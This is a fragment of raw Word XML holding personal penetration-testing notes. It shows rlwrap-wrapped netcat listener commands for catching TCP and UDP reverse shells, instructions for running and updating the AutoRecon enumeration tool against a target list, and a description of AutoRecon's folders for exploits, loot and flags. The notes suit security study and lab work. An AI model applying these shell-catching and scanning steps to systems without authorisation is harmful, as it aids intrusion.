          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to catch UDP reverse shells:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000280">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="934"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap nc -lvnup 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000281">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="934"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You have to add the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-u </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">f</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lag</w:t>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap -cA nc -lvnp 4444</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="581"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" flag means </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete filenames in the current directory</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This enables </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tab-completion </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for filenames when typing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000286">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="581"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Doesn't seem to work sometimes. It sometimes autocorrects to files that are on my local kali instead of the ones in the reverse shell!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000287">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="581"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "-</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" flag means Always remain in "readline" mode. Without this, rlwrap may exit when the underlying command (like nc) switches modes (e.g., from interactive input to sending output).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -A makes rlwrap stay active</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>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t xml:space="preserve">I think the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -c </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">f</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lag is really helpful, but maybe avoid the -A flag</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D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_emx49toal5ye" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AutoRecon</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hyperlink r:id="rId14">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/Tib3rius/AutoRecon</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If a script it taking too long, you can dynamically change the verbosity while autorecon is still running to see what the script is. You can do this by hitting the up and down arrow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000292">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1739900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="13"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t xml:space="preserve">To run as sudo, use one of the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000295">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="818"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo $(which autorecon) -t targets.txt </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000296">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="818"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo env "PATH=$PATH" autorecon -t targets.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000297">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="818"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to exclude dirbusting, then add: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--exclude-tags=dirbuster</w:t>
      </w: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highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Always look at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">_patterns.log </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for useful information!</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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to run it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="334"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">autorecon -t targets.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="334"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">autorecon -v -t targets.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029E">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="334"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo $(which autorecon) -v -t targets.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="334"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo $(which autorecon) -t targets.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="334"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">targets.txt is a file with all the IPs, and it's one IP per line</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Some notes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1228"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you already have a "results" folder, and then you want to run autorecon on new targets, just run autorecon. It won't delete any previous folders</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1228"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you run autorecon twice on the same machine, the second time it will overwrite all the files in the original</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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I installed using pipx, so to update, just run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="685"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pipx upgrade autorecon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AC">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2921000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="272" name="image260.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image260.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1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ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AE">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The exploit directory is intended to contain any exploit code you download / write for the target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AF">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The loot directory is intended to contain any loot (e.g. hashes, interesting files) you find on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B0">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The report directory contains some auto-generated files and directories that are useful for reporting:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="767"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">local.txt can be used to store the local.txt flag found on targets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="767"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">notes.txt should contain a basic template where you can write notes for each service discovered.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="767"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proof.txt can be used to store the proof.txt flag found on targets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="767"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The screenshots directory is intended to contain the screenshots you use to document the exploitation of the target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B5">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The scans directory is where all results from scans performed by AutoRecon will go. This includes port scans / service detection scans, as well as any service enumeration scans. It also contains two other files:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="435"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">_commands.log contains a list of every command AutoRecon ran against the target. This is useful if one of the commands fails and you want to run it again with modifications.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="435"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">_manual_commands.txt contains any commands that are deemed "too dangerous" to run automatically, either because they are too intrusive, require modification based on human analysis, or just work better when there is a human monitoring them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B8">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By default, directories are created for each open port (e.g. tcp80, udp53) and scan results for the services found on those ports are stored in their respective directories. You can disable this behavior using the --no-port-dirs command line option, and scan results will instead be stored in the scans directory itself.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B9">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If a scan results in an error, a file called _errors.log will also appear in the scans directory with some details to alert the user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BA">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If output matches a defined pattern, a file called _patterns.log will also appear in the scans directory with details about the matched output.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BB">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The scans/xml directory stores any XML output (e.g. from Nmap scans) separately from the main scan outputs, so that the scans directory itself does not get too cluttered.</w:t>
      </w:r>
    </w:p>
